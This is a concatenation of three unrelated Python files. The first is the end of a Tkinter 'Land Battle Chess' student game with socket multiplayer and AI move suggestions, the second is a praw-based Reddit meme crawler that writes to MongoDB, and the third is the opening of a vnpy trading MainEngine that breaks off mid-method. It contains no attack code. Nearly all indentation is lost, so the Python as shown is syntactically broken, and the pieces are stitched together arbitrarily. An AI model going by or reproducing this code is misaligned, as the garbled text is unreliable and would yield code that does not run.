for (a, b) in isLegal(data.board, data.firstSelect):
data.board[a][b].highlight()
(i, j) = data.firstSelect
data.firstSelect = None
data.board[i][j].select()
else:
# a piece is selected
(i, j) = getLocation(event.x, event.y)
if data.myPID == "PlayerA":
(i, j) = (11-i, 4-j) # reverse the board
# selected a piece to move
if data.selectCount == 0 and data.board[i][j].piece != None and data.board[i][j].piece.side == data.turn:
# cannot move opponent's pieces
if (data.myPID == "PlayerA" and data.turn == "A") or (data.myPID == "PlayerB" and data.turn == "B"):
data.selectCount += 1
data.board[i][j].select()
data.firstSelect = (i, j)
for (a, b) in isLegal(data.board, data.firstSelect):
data.board[a][b].highlight()
# selected a spot to move to
elif data.selectCount == 1:
if (i, j) in isLegal(data.board, data.firstSelect):
(a, b) = data.firstSelect
msg = "playerMoved %d %d %d %d\n" % (a, b, i, j)
print("sending: ", msg)
data.server.send(msg.encode())
data.timer = 0
data.playerMove = (a, b, i, j)
for x in range(12):
for y in range(5):
if data.board[x][y].highlighted:
data.board[x][y].highlighted = False
if data.board[x][y].selected:
data.board[x][y].selected = False
elif data.mode == "onePlayerGame" and data.turn == "B":
if getLocation(event.x, event.y) == None:
#clear selection
data.selectCount = 0
if data.firstSelect != None:
for (a, b) in isLegal(data.board, data.firstSelect):
data.board[a][b].highlight()
(i, j) = data.firstSelect
data.firstSelect = None
data.board[i][j].select()
else:
# a piece is selected
(i, j) = getLocation(event.x, event.y)
# selected a piece to move
if data.selectCount == 0 and data.board[i][j].piece != None and data.board[i][j].piece.side == data.turn:
data.selectCount += 1
data.board[i][j].select()
data.firstSelect = (i, j)
for (a, b) in isLegal(data.board, data.firstSelect):
data.board[a][b].highlight()
# selected a spot to move to
elif data.selectCount == 1:
if (i, j) in isLegal(data.board, data.firstSelect):
(a, b) = data.firstSelect
if data.board[i][j].piece == None:
data.board[i][j].piece = data.board[a][b].piece
data.board[a][b].piece = None
else:
# two pieces contact
contactWithGameOverCheck(a, b, i, j, data)
data.firstSelect = None
data.selectCount = 0
data.countdown = 20
data.turn = "A"
for x in range(12):
for y in range(5):
if data.board[x][y].highlighted:
data.board[x][y].highlighted = False
if data.board[x][y].selected:
data.board[x][y].selected = False
def keyPressed(event, data):
# enter help mode
if event.char == "h" and data.mode != "help" and data.mode != "help2":
data.lastMode = data.mode
data.mode = "help"
# return to game
elif event.char == "r":
data.mode = data.lastMode
# next page in help mode
elif event.char == "n" and data.mode == "help":
data.mode = "help2"
# restart game
elif event.char == "s":
myPID = data.myPID
otherPlayerOnline = data.otherPlayerOnline
init(data)
data.myPID = myPID
data.otherPlayerOnline = otherPlayerOnline
# getting AI-suggested move
elif data.mode == "twoPlayerGame" and event.char == "a" and data.displaySuggestedMove == 0 and not data.darkMode:
for x in range(12):
for y in range(5):
if data.board[x][y].highlighted:
data.board[x][y].highlighted = False
if data.board[x][y].selected:
data.board[x][y].selected = False
# get suggested A move
if data.myPID == "PlayerA":
board = copy.deepcopy(data.board)
((a, b, i, j), bestScore) = AIMove(board, 4) # maxDepth = 4
data.move = (a, b, i, j)
data.board[a][b].select()
data.board[i][j].highlight()
data.displaySuggestedMove = 1
# get suggested B move
elif data.myPID == "PlayerB":
board = copy.deepcopy(data.board)
((a, b, i, j), bestScore) = PlayerMove(board, 4) # maxDepth = 4
data.move = (a, b, i, j)
data.board[a][b].select()
data.board[i][j].highlight()
data.displaySuggestedMove = 1
def getServerMsg(data):
while serverMsg.qsize() > 0:
if data.winner != None:
break
msg = serverMsg.get(False)
try:
print("received: ", msg, "\n")
msg = msg.split()
command = msg[0]
if command == "myIDis":
myPID = msg[1]
data.myPID = myPID
elif command == "newPlayer":
data.otherPlayerOnline = True
elif data.mode == "twoPlayerLayout" and command == "playerSwitched":
PID = msg[1]
a = int(msg[2])
b = int(msg[3])
c = int(msg[4])
d = int(msg[5])
data.board[a][b].piece, data.board[c][d].piece = data.board[c][d].piece, data.board[a][b].piece
elif data.mode == "twoPlayerGame" and command == "playerMoved":
PID = msg[1]
a = int(msg[2])
b = int(msg[3])
i = int(msg[4])
j = int(msg[5])
data.playerMove = (a, b, i, j)
data.timer = 0
elif command == "playerReady":
data.otherPlayerReady = True
print("received ready")
except:
print("failed")
serverMsg.task_done()
def timerFired(data):
getServerMsg(data)
if data.selfPlayerReady and data.otherPlayerReady and data.mode == "twoPlayerLayout":
data.mode = "twoPlayerGame"
elif data.mode == "twoPlayerGame":
# displaying AI-suggested move
if data.displaySuggestedMove > 0:
data.displaySuggestedMove += 1
if data.displaySuggestedMove == 4:
data.displaySuggestedMove = 0
# undo suggestion
(a, b, i, j) = data.move
data.board[a][b].select()
data.board[i][j].highlight()
data.move = None
# display move
if data.timer == 0:
data.timer += 1
(a, b, i, j) = data.playerMove
data.board[a][b].select()
elif data.timer == 1:
data.timer += 1
(a, b, i, j) = data.playerMove
data.board[i][j].highlight()
# make move
elif data.timer == 2:
data.timer = None
(a, b, i, j) = data.playerMove
if data.board[i][j].piece == None:
data.board[i][j].piece = data.board[a][b].piece
data.board[a][b].piece = None
else: # two pieces contact
contactWithGameOverCheck(a, b, i, j, data)
data.firstSelect = None
data.selectCount = 0
data.countdown = 20
if data.turn == "B":
data.turn = "A"
else:
data.turn = "B"
marA = marB = False
for x in range(12):
for y in range(5):
if data.board[x][y].highlighted:
data.board[x][y].highlighted = False
if data.board[x][y].selected:
data.board[x][y].selected = False
if data.board[x][y].piece != None and data.board[x][y].piece.order == 9:
if data.board[x][y].piece.side == "A":
marA = True
else:
marB = True
data.marA, data.marB = marA, marB
# not making or displaying move
else:
data.countdown -= 1
if data.countdown <= 0:
data.countdown = 20
data.firstSelect = None
data.selectCount = 0
if data.turn == "B":
data.turn = "A"
else:
data.turn = "B"
for x in range(12):
for y in range(5):
try:
if data.board[x][y].highlighted:
data.board[x][y].highlighted = False
if data.board[x][y].selected:
data.board[x][y].selected = False
except:
pass
elif data.mode == "onePlayerGame":
data.countdown -= 1
if data.countdown <= 0:
data.countdown = 20
data.firstSelect = None
data.selectCount = 0
if data.turn == "B":
data.turn = "A"
else:
data.turn = "B"
for x in range(12):
for y in range(5):
try:
if data.board[x][y].highlighted:
data.board[x][y].highlighted = False
if data.board[x][y].selected:
data.board[x][y].selected = False
except:
pass
# get AI move
if data.turn == "A" and data.countdown == 19 and data.winner == None:
board = copy.deepcopy(data.board)
((a, b, i, j), bestScore) = AIMove(board, data.maxDepth)
data.move = (a, b, i, j)
data.board[a][b].select()
# display AI move
elif data.turn == "A" and data.countdown == 18 and data.winner == None and data.move != None:
(a, b, i, j) = data.move
data.board[i][j].highlight()
elif data.turn == "A" and data.countdown == 17 and data.winner == None and data.move != None:
(a, b, i, j) = data.move
# undo highlight and selection
data.board[a][b].select()
data.board[i][j].highlight()
data.move = None
# make move
if data.board[i][j].piece == None:
data.board[i][j].piece = data.board[a][b].piece
data.board[a][b].piece = None
else: # two pieces contact
contactWithGameOverCheck(a, b, i, j, data)
data.turn = "B"
data.countdown = 20
def redrawAll(canvas, data):
canvas.create_image(data.width/2, data.height/2, image=data.background)
if data.mode == "start":
drawStartPage(canvas, data)
elif data.mode == "selectDifficulty":
canvas.create_text(300, 180, text="Select Difficulty", font="Copperplate 50")
#canvas.create_rectangle(200, 340, 400, 400, width=3)
canvas.create_line(210, 340, 390, 340, width=3)
canvas.create_line(210, 400, 390, 400, width=3)
canvas.create_line(200, 350, 200, 390, width=3)
canvas.create_line(400, 350, 400, 390, width=3)
canvas.create_arc(200, 340, 220, 360, start=90, extent=90, width=3, style="arc")
canvas.create_arc(380, 340, 400, 360, start=0, extent=90, width=3, style="arc")
canvas.create_arc(200, 380, 220, 400, start=180, extent=90, width=3, style="arc")
canvas.create_arc(380, 380, 400, 400, start=270, extent=90, width=3, style="arc")
canvas.create_text(300, 370, text="Easy", font="Arial 23")
#canvas.create_rectangle(200, 420, 400, 480, width=3)
canvas.create_line(210, 420, 390, 420, width=3)
canvas.create_line(210, 480, 390, 480, width=3)
canvas.create_line(200, 430, 200, 470, width=3)
canvas.create_line(400, 430, 400, 470, width=3)
canvas.create_arc(200, 420, 220, 440, start=90, extent=90, width=3, style="arc")
canvas.create_arc(380, 420, 400, 440, start=0, extent=90, width=3, style="arc")
canvas.create_arc(200, 460, 220, 480, start=180, extent=90, width=3, style="arc")
canvas.create_arc(380, 460, 400, 480, start=270, extent=90, width=3, style="arc")
canvas.create_text(300, 450, text="Hard", font="Arial 23")
elif data.mode == "help":
drawHelpPage(canvas, data)
elif data.mode == "help2":
drawHelp2Page(canvas, data)
elif data.mode == "twoPlayerLayout":
drawBoardSkeleton(canvas, data)
# drawing posts
if data.myPID == "PlayerA":
for x in range(len(data.board)):
for y in range(len(data.board[0])):
if x < 6:
data.board[x][y].reversedDraw(canvas)
else:
# hiding opponent's layout
data.board[x][y].reversedDrawDark(canvas)
else:
for x in range(len(data.board)):
for y in range(len(data.board[0])):
if x >= 6:
data.board[x][y].draw(canvas)
else:
# hiding opponent's layout
data.board[x][y].drawDark(canvas)
canvas.create_text(175, 420, text="Press \"H\" for help", font="Arial 15")
if data.otherPlayerOnline:
canvas.create_text(175, 380, text="To rearrange layout,", font="Arial 15")
canvas.create_text(175, 400, text="select pieces to switch", font="Arial 15")
if not data.selfPlayerReady:
#canvas.create_rectangle(385, 380, 465, 420, width=2)
canvas.create_line(390, 380, 460, 380, width=2)
canvas.create_line(390, 420, 460, 420, width=2)
canvas.create_line(385, 385, 385, 415, width=2)
canvas.create_line(465, 385, 465, 415, width=2)
canvas.create_arc(385, 380, 395, 390, start=90, extent=90, style="arc", width=2)
canvas.create_arc(455, 380, 465, 390, start=0, extent=90, style="arc", width=2)
canvas.create_arc(385, 410, 395, 420, start=180, extent=90, style="arc", width=2)
canvas.create_arc(455, 410, 465, 420, start=270, extent=90, style="arc", width=2)
canvas.create_text(425, 400, text="READY", font="Arial 20")
else:
canvas.create_text(425, 390, text="Waiting for the other", font="Arial 15")
canvas.create_text(425, 410, text="player to complete layout...", font="Arial 15")
else:
canvas.create_text(425, 390, text="Waiting for the other", font="Arial 15")
canvas.create_text(425, 410, text="player to get online...", font="Arial 15")
if data.errorMsg != None:
canvas.create_rectangle(0, 370, 600, 430, fill="red3")
canvas.create_text(300, 400, text=data.errorMsg, font="Arial 20")
elif data.mode == "onePlayerLayout":
drawBoardSkeleton(canvas, data)
for x in range(len(data.board)):
for y in range(len(data.board[0])):
if x < 6:
# hiding AI's layout
data.board[x][y].drawDark(canvas)
else:
data.board[x][y].draw(canvas)
canvas.create_text(175, 380, text="To rearrange layout,", font="Arial 15")
canvas.create_text(175, 400, text="select pieces to switch", font="Arial 15")
canvas.create_text(175, 420, text="Press \"H\" for help", font="Arial 15")
#canvas.create_rectangle(385, 380, 465, 420, width=2)
canvas.create_line(390, 380, 460, 380, width=2)
canvas.create_line(390, 420, 460, 420, width=2)
canvas.create_line(385, 385, 385, 415, width=2)
canvas.create_line(465, 385, 465, 415, width=2)
canvas.create_arc(385, 380, 395, 390, start=90, extent=90, style="arc", width=2)
canvas.create_arc(455, 380, 465, 390, start=0, extent=90, style="arc", width=2)
canvas.create_arc(385, 410, 395, 420, start=180, extent=90, style="arc", width=2)
canvas.create_arc(455, 410, 465, 420, start=270, extent=90, style="arc", width=2)
canvas.create_text(425, 400, text="START", font="Arial 20")
if data.errorMsg != None:
canvas.create_rectangle(0, 370, 600, 430, fill="red3")
canvas.create_text(300, 400, text=data.errorMsg, font="Arial 20")
elif data.mode == "twoPlayerGame":
drawBoardSkeleton(canvas, data)
# drawing posts
if data.myPID == "PlayerA":
for x in range(len(data.board)):
for y in range(len(data.board[0])):
if data.darkMode:
# hide opponent's pieces
if data.board[x][y].piece != None and data.board[x][y].piece.side == "B":
# flag is revealed when Marshall is dead
if data.board[x][y].piece.order == 0 and not data.marB:
data.board[x][y].reversedDraw(canvas)
else:
data.board[x][y].reversedDrawDark(canvas)
else:
data.board[x][y].reversedDraw(canvas)
else:
data.board[x][y].reversedDraw(canvas)
else:
for x in range(len(data.board)):
for y in range(len(data.board[0])):
if data.darkMode:
# hide opponent's pieces
if data.board[x][y].piece != None and data.board[x][y].piece.side == "A":
# flag is revealed when Marshall is dead
if data.board[x][y].piece.order == 0 and not data.marA:
data.board[x][y].draw(canvas)
else:
data.board[x][y].drawDark(canvas)
else:
data.board[x][y].draw(canvas)
else:
data.board[x][y].draw(canvas)
if data.darkMode:
canvas.create_text(175, 390, text="Press \"H\" for help", font="Arial 15")
canvas.create_text(175, 410, text="Press \"S\" to restart game", font="Arial 15")
else:
canvas.create_text(175, 380, text="Press \"A\" for AI-suggested move", font="Arial 15")
canvas.create_text(175, 400, text="Press \"H\" for help", font="Arial 15")
canvas.create_text(175, 420, text="Press \"S\" to restart game", font="Arial 15")
if data.timer != None:
# display move
canvas.create_text(425, 390, text="Making move...", font="Arial 15")
elif data.turn == "B":
canvas.create_text(425, 390, text="Blue Player's Turn", font="Arial 15")
canvas.create_text(425, 410, text="Time remaining: "+str(data.countdown), font="Arial 15")
else:
canvas.create_text(425, 390, text="Orange Player's Turn", font="Arial 15")
canvas.create_text(425, 410, text="Time remaining: "+str(data.countdown), font="Arial 15")
if data.winner != None:
# displaying game-over message
canvas.create_rectangle(0, 370, 600, 430, fill="red3")
if (data.winner == "A" and data.myPID == "PlayerA") or (data.winner == "B" and data.myPID == "PlayerB"):
canvas.create_text(300, 400, text="You win! Press \"S\" to restart", font="Arial 28")
else:
canvas.create_text(300, 400, text="You lose! Press \"S\" to restart", font="Arial 28")
elif data.mode == "onePlayerGame":
drawBoard(canvas, data)
canvas.create_text(175, 390, text="Press \"H\" for help", font="Arial 15")
canvas.create_text(175, 410, text="Press \"S\" to restart game", font="Arial 15")
if data.turn == "B":
canvas.create_text(425, 390, text="Your Turn", font="Arial 15")
canvas.create_text(425, 410, text="Time remaining: "+str(data.countdown), font="Arial 15")
else:
canvas.create_text(425, 390, text="AI Player's Turn", font="Arial 15")
if data.winner != None:
# display game-over message
canvas.create_rectangle(0, 370, 600, 430, fill="red3")
if data.winner == "A":
canvas.create_text(300, 400, text="You lose! Press \"S\" to restart", font="Arial 28")
else:
canvas.create_text(300, 400, text="You win! Press \"S\" to restart", font="Arial 28")
def drawStartPage(canvas, data):
canvas.create_text(300, 180, text="Land Battle Chess", font="Copperplate 50")
canvas.create_text(300, 240, text="Carnegie Mellon University", font="Arial 18")
canvas.create_text(300, 270, text="15-112 Term Project", font="Arial 18")
canvas.create_text(300, 300, text="by Yiwen (Victor) Song", font="Arial 18")
#canvas.create_rectangle(200, 340, 400, 400, width=3)
canvas.create_line(210, 340, 390, 340, width=3)
canvas.create_line(210, 400, 390, 400, width=3)
canvas.create_line(200, 350, 200, 390, width=3)
canvas.create_line(400, 350, 400, 390, width=3)
canvas.create_arc(200, 340, 220, 360, start=90, extent=90, width=3, style="arc")
canvas.create_arc(380, 340, 400, 360, start=0, extent=90, width=3, style="arc")
canvas.create_arc(200, 380, 220, 400, start=180, extent=90, width=3, style="arc")
canvas.create_arc(380, 380, 400, 400, start=270, extent=90, width=3, style="arc")
canvas.create_text(300, 370, text="Play singleplayer", font="Arial 23")
#canvas.create_rectangle(200, 420, 400, 480, width=3)
canvas.create_line(210, 420, 390, 420, width=3)
canvas.create_line(210, 480, 390, 480, width=3)
canvas.create_line(200, 430, 200, 470, width=3)
canvas.create_line(400, 430, 400, 470, width=3)
canvas.create_arc(200, 420, 220, 440, start=90, extent=90, width=3, style="arc")
canvas.create_arc(380, 420, 400, 440, start=0, extent=90, width=3, style="arc")
canvas.create_arc(200, 460, 220, 480, start=180, extent=90, width=3, style="arc")
canvas.create_arc(380, 460, 400, 480, start=270, extent=90, width=3, style="arc")
canvas.create_text(300, 450, text="Play multiplayer", font="Arial 23")
#canvas.create_rectangle(200, 500, 400, 580, width=3)
canvas.create_line(210, 500, 390, 500, width=3)
canvas.create_line(210, 580, 390, 580, width=3)
canvas.create_line(200, 510, 200, 570, width=3)
canvas.create_line(400, 510, 400, 570, width=3)
canvas.create_arc(200, 500, 220, 520, start=90, extent=90, width=3, style="arc")
canvas.create_arc(380, 500, 400, 520, start=0, extent=90, width=3, style="arc")
canvas.create_arc(200, 560, 220, 580, start=180, extent=90, width=3, style="arc")
canvas.create_arc(380, 560, 400, 580, start=270, extent=90, width=3, style="arc")
canvas.create_text(300, 525, text="Play multiplayer", font="Arial 23")
canvas.create_text(300, 555, text="(Dark Mode)", font="Arial 23")
canvas.create_text(300, 640, text="Press \"H\" for game instructions", font="Arial 23")
def drawHelpPage(canvas, data):
canvas.create_text(300, 60, text="Help Manual", font="Copperplate 35")
canvas.create_text(50, 100, text="Welcome to the Land Battle Chess game! The following introduction", anchor="w", font="Arial 15")
canvas.create_text(50, 120, text="is partly derived from https://en.wikipedia.org/wiki/Luzhanqi", anchor="w", font="Arial 15")
canvas.create_text(50, 150, text="The aim of the game is to capture the opponent flag through penetrating", anchor="w", font="Arial 15")
canvas.create_text(50, 170, text="the defenses. Each player arranges the layout of their pieces prior to the game.", anchor="w", font="Arial 15")
canvas.create_text(50, 200, text="There are 3 kinds of stations: Posts, Camps, and Headquarters.", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 220, 100, 244, fill="PaleGreen3")
canvas.create_text(120, 232, text="Post: a piece can move on or off and can be attacked on a post", anchor="w", font="Arial 15")
canvas.create_oval(50, 260, 100, 300, fill="PaleGreen3")
canvas.create_text(120, 280, text="Camp: a piece in a camp cannot be attacked", anchor="w", font="Arial 15")
canvas.create_oval(75-25/2, 342-24, 75+25/2, 342, fill="black")
canvas.create_oval(75-25/2, 342, 75+25/2, 342+24, fill="black")
canvas.create_rectangle(50, 330, 100, 354, fill="PaleGreen3")
canvas.create_text(120, 332, text="Headquarter: pieces may only move in but not out of a headquarter", anchor="w", font="Arial 15")
canvas.create_text(120, 352, text="The Flag must be placed on one of the two headquarters of each side", anchor="w", font="Arial 15")
canvas.create_text(50, 400, text="Posts/Camps/Headquarters are connected by either a Road or a Railroad.", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 430, 100, 454, fill="PaleGreen3")
canvas.create_rectangle(50, 490, 100, 514, fill="PaleGreen3")
canvas.create_line(75, 454, 75, 490)
canvas.create_text(120, 462, text="Road: marked as thin lines on the board", anchor="w", font="Arial 15")
canvas.create_text(120, 482, text="A piece can only travel one space across a road in one move", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 530, 100, 554, fill="PaleGreen3")
canvas.create_rectangle(50, 590, 100, 614, fill="PaleGreen3")
canvas.create_line(75, 554, 75, 590, width=3)
canvas.create_text(120, 552, text="Railroad: marked as thick lines on the board", anchor="w", font="Arial 15")
canvas.create_text(120, 572, text="A piece can travel multiple spaces along a railroad in a straight line", anchor="w", font="Arial 15")
canvas.create_text(120, 592, text="as long as its path is not obstructed by another piece", anchor="w", font="Arial 15")
canvas.create_text(50, 660, text="Press \"N\" to see next page about the different pieces.", anchor="w", font="Arial 15")
canvas.create_text(50, 690, text="Press \"R\" to return to game", anchor="w", font="Arial 15")
def drawHelp2Page(canvas, data):
canvas.create_text(300, 60, text="Help Manual (cont'd)", font="Copperplate 35")
canvas.create_rectangle(50, 90, 100, 114, fill="deep sky blue")
canvas.create_text(75, 102, text="Mar10")
canvas.create_text(120, 102, text="Marshal * 1: order 10, highest order piece. In Dark Mode,", anchor="w", font="Arial 15")
    canvas.create_text(205, 122, text="the flag is revealed when the Marshal is dead", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 140, 100, 164, fill="deep sky blue")
canvas.create_text(75, 152, text="Gen9")
canvas.create_text(120, 152, text="General * 2: order 9", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 180, 100, 204, fill="deep sky blue")
canvas.create_text(75, 192, text="MGen8")
canvas.create_text(120, 192, text="Major General * 2: order 8", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 220, 100, 244, fill="deep sky blue")
canvas.create_text(75, 232, text="BGen7")
canvas.create_text(120, 232, text="Brigadier General * 2: order 7", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 260, 100, 284, fill="deep sky blue")
canvas.create_text(75, 272, text="Col6")
canvas.create_text(120, 272, text="Colonel * 2: order 6", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 300, 100, 324, fill="deep sky blue")
canvas.create_text(75, 312, text="Maj5")
canvas.create_text(120, 312, text="Major * 2: order 5", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 340, 100, 364, fill="deep sky blue")
canvas.create_text(75, 352, text="Capt4")
canvas.create_text(120, 352, text="Captain * 3: order 4", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 380, 100, 404, fill="deep sky blue")
canvas.create_text(75, 392, text="Lt3")
canvas.create_text(120, 392, text="Lieutenant * 3: order 3", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 420, 100, 444, fill="deep sky blue")
canvas.create_text(75, 432, text="Spr2")
canvas.create_text(120, 432, text="Sapper * 3: order 2, can turn corners when travelling along Railroad", anchor="w", font="Arial 15")
canvas.create_text(200, 450, text="and can capture landmines", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 470, 100, 494, fill="deep sky blue")
canvas.create_text(75, 482, text="Bomb")
canvas.create_text(120, 482, text="Bomb * 2: when a bomb comes in contact with an enemy piece,", anchor="w", font="Arial 15")
canvas.create_text(190, 500, text="both pieces are removed from the board; ", anchor="w", font="Arial 15")
canvas.create_text(190, 518, text="bombs cannot initially be placed on the first rank", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 540, 100, 564, fill="deep sky blue")
canvas.create_text(75, 552, text="LMN")
canvas.create_text(120, 552, text="Landmine * 3: immune to any attack except when captured by a", anchor="w", font="Arial 15")
canvas.create_text(210, 570, text="Sapper or co-destroyed by a bomb; landmines can", anchor="w", font="Arial 15")
canvas.create_text(210, 588, text="only be placed on the last two ranks and cannot move", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 610, 100, 634, fill="deep sky blue")
canvas.create_text(75, 622, text="Flag1")
canvas.create_text(120, 622, text="Flag * 1: can be captured by any enemy piece, which ends the game;", anchor="w", font="Arial 15")
canvas.create_text(180, 640, text="the Flag must be placed at a headquarter and cannot move", anchor="w", font="Arial 15")
canvas.create_text(50, 690, text="Press \"R\" to return to game", anchor="w", font="Arial 15")
def drawBoard(canvas, data):
drawBoardSkeleton(canvas, data)
# drawing posts
for x in range(len(data.board)):
for y in range(len(data.board[0])):
data.board[x][y].draw(canvas)
def drawBoardSkeleton(canvas, data):
# margin = 50
# drawing railroads
canvas.create_line(50, 110, 50, 690, width=3)
canvas.create_line(50, 110, 550, 110, width=3)
canvas.create_line(50, 690, 550, 690, width=3)
canvas.create_line(550, 110, 550, 690, width=3)
canvas.create_line(50, 350, 550, 350, width=3)
canvas.create_line(50, 450, 550, 450, width=3)
canvas.create_line(300, 350, 300, 450, width=3)
# drawing roads
for i in range(50, 400, 60):
canvas.create_line(50, i, 550, i)
for i in range(750, 500, -60):
canvas.create_line(50, i, 550, i)
for i in range(50, 600, 250):
canvas.create_line(i, 50, i, 750)
canvas.create_line(175, 50, 175, 350)
canvas.create_line(425, 50, 425, 350)
canvas.create_line(175, 450, 175, 750)
canvas.create_line(425, 450, 425, 750)
canvas.create_line(50, 110, 550, 350)
canvas.create_line(300, 110, 550, 230)
canvas.create_line(50, 230, 300, 350)
canvas.create_line(50, 350, 550, 110)
canvas.create_line(50, 230, 300, 110)
canvas.create_line(300, 350, 550, 230)
canvas.create_line(50, 450, 550, 690)
canvas.create_line(300, 450, 550, 570)
canvas.create_line(50, 570, 300, 690)
canvas.create_line(50, 570, 300, 450)
canvas.create_line(50, 690, 550, 450)
canvas.create_line(300, 690, 550, 570)
#################################################################
# the run function is derived from
# https://www.cs.cmu.edu/~112/notes/notes-animations-part2.html#starter-code
# with modifications for Socket module
def run(width, height, serverMsg=None, server=None):
def redrawAllWrapper(canvas, data):
canvas.delete(ALL)
canvas.create_rectangle(0, 0, data.width, data.height,
fill='white', width=0)
redrawAll(canvas, data)
canvas.update()
def mousePressedWrapper(event, canvas, data):
mousePressed(event, data)
redrawAllWrapper(canvas, data)
def keyPressedWrapper(event, canvas, data):
keyPressed(event, data)
redrawAllWrapper(canvas, data)
def timerFiredWrapper(canvas, data):
timerFired(data)
redrawAllWrapper(canvas, data)
# pause, then call timerFired again
canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)
# Set up data and call init
class Struct(object): pass
data = Struct()
data.server = server
data.serverMsg = serverMsg
data.width = width
data.height = height
data.timerDelay = 1000 # milliseconds
root = Tk()
init(data)
# create the root and the canvas
canvas = Canvas(root, width=data.width, height=data.height)
canvas.configure(bd=0, highlightthickness=0)
canvas.pack()
# set up events
root.bind("<Button-1>", lambda event:
mousePressedWrapper(event, canvas, data))
root.bind("<Key>", lambda event:
keyPressedWrapper(event, canvas, data))
timerFiredWrapper(canvas, data)
# and launch the app
root.mainloop() # blocks until window is closed
print("bye!")
serverMsg = Queue(100)
threading.Thread(target = handleServerMsg, args = (server, serverMsg)).start()
run(600, 800, serverMsg, server)
|
reddit.py
|
import time
import praw
import threading
import settings
from crawlers.generic import BaseCrawler
reddit_praw = praw.Reddit(client_id=settings.REDDIT_CLIENT_ID, client_secret=settings.REDDIT_CLIENT_SECRET,
password=settings.REDDIT_PASSWORD,
user_agent='memeID-C7', username=settings.REDDIT_USERNAME)
PAGE_SIZE = 100
def r_get_feed_new(sr, params):
return sr.new(limit=PAGE_SIZE, params=params)
def r_get_submission_comments(url):
return reddit_praw.submission(url=url).comments
class RedditCrawler(BaseCrawler):
sub_reddits = []
def __init__(self, sub_reddits, *args, **kwargs):
super(RedditCrawler, self).__init__(source='reddit', *args, **kwargs)
self.url = 'https://reddit.com'
self.sub_reddits = sub_reddits
def get_feed(self, sub_reddit, params, page_size=PAGE_SIZE):
return sub_reddit.new(limit=page_size, params=params)
def get_subscribers(self, sub_reddit):
return sub_reddit.subscribers
def _pre_process_data(self, subreddit, data):
results = []
last = None
for d in data:
if d.created_utc >= settings.BEGIN_CRAWL_SINCE:
results.append(
{
"id": d.id,
"upvote_count": d.ups,
"score": d.score,
"comment_count": d.num_comments,
"image_url": d.url,
"file_name": 'data/reddit/{}.jpg'.format(d.id),
"source": self.source,
"url": d.shortlink,
"created_at": d.created_utc,
"child_source": "r/{}".format(d.subreddit.display_name).lower(),
"subreddit_id": d.subreddit_id,
"title": d.title,
"is_video": d.is_video
}
)
last = d
return results, last
def _fetch_subscribers(self):
for sub_reddit in self.sub_reddits:
sr = reddit_praw.subreddit(sub_reddit)
try:
s_name = sub_reddit
if not sub_reddit.startswith('r/'):
s_name = 'r/' + sub_reddit
self.mongo_database.update_source_followers(s_name, self.get_subscribers(sr))
except:
self._log_console("Failed to fetch subscribers...")
def run(self):
self._log_console("Starting up {} crawler ...".format(self.source))
self._create_mongo_db_connection()
params = {}
threading.Thread(target=self._fetch_subscribers).start()
while self.running:
try:
for sub_reddit in self.sub_reddits:
params = {}
sr = reddit_praw.subreddit(sub_reddit)
data = self.get_feed(sr, params)
pre_processed_data, last = self._pre_process_data(data=data, subreddit=sub_reddit)
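                    # 'after' (fullname of the last item seen) and 'count'
                    # (number of items already fetched) are Reddit's standard
                    # listing pagination parameters.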
if last is not None:
params.update({"after": last.name})
if 'count' not in params:
params['count'] = 0
params['count'] += 100
else:
if 'count' not in params:
params['count'] = 0
params['count'] += 100
inserted, oldest_timestamp = self.process_data(pre_processed_data)
time.sleep(8)
self._log_console("Iteration ended ...")
except Exception as e:
print(e)
self._log_console("Exception on main thread run()")
|
engine.py
|
"""
"""
import logging
from logging import Logger
import smtplib
import os
from abc import ABC
from datetime import datetime
from email.message import EmailMessage
from queue import Empty, Queue
from threading import Thread
from typing import Any, Sequence, Type, Dict, List, Optional
from vnpy.event import Event, EventEngine
from .app import BaseApp
from .event import (
EVENT_TICK,
EVENT_ORDER,
EVENT_TRADE,
EVENT_POSITION,
EVENT_ACCOUNT,
EVENT_CONTRACT,
EVENT_LOG
)
from .gateway import BaseGateway
from .object import (
CancelRequest,
LogData,
OrderRequest,
SubscribeRequest,
HistoryRequest,
AccountTradeRequest,
OrderData,
BarData,
TickData,
TradeData,
PositionData,
AccountData,
ContractData,
Exchange,
BalanceRequest
)
from .setting import SETTINGS
from .utility import get_folder_path, TRADER_DIR
class MainEngine:
"""
Acts as the core of VN Trader.
"""
def __init__(self, event_engine: EventEngine = None):
""""""
if event_engine:
self.event_engine: EventEngine = event_engine
else:
self.event_engine = EventEngine()
self.event_engine.start()
self.gateways: Dict[str, BaseGateway] = {}
self.engines: Dict[str, BaseEngine] = {}
self.apps: Dict[str, BaseApp] = {}
self.exchanges: List[Exchange] = []
os.chdir(TRADER_DIR) # Change working directory
self.init_engines() # Initialize function engines
def add_engine(self, engine_class: Any) -> "BaseEngine":
"""
Add function engine.
"""
engine = engine_class(self, self.event_engine)
self.engines[engine.engine_name] = engine
return engine
def add_gateway(self, gateway_class: Type[BaseGateway]) -> BaseGateway:
"""
Add gateway.
"""
gateway = gateway_class(self.event_engine)
self.gateways[gateway.gateway_name] = gateway
# Add gateway supported exchanges into engine
for exchange in gateway.exchanges:
if exchange not in self.exchanges:
self.exchanges.append(exchange)
return gateway
def add_app(self, app_class: Type[BaseApp]) -> "BaseEngine":
"""
Add app.
"""
app = app_class()
self.apps[app.app_name] = app
engine = self.add_engine(app.engine_class)
return engine
def init_engines(self) -> None:
"""
Init all engines.
"""
self.add_engine(LogEngine)
self.add_engine(OmsEngine)
self.add_engine(EmailEngine)
def write_log(self, msg: str, source: str = "") -> None:
"""
Put log event with specific message.
"""
log = LogData(msg=msg, gateway_name=source)
event = Event(EVENT_LOG, log)
self.event_engine.put(event)
def get_gateway(self, gateway_name: str) -> BaseGateway:
"""
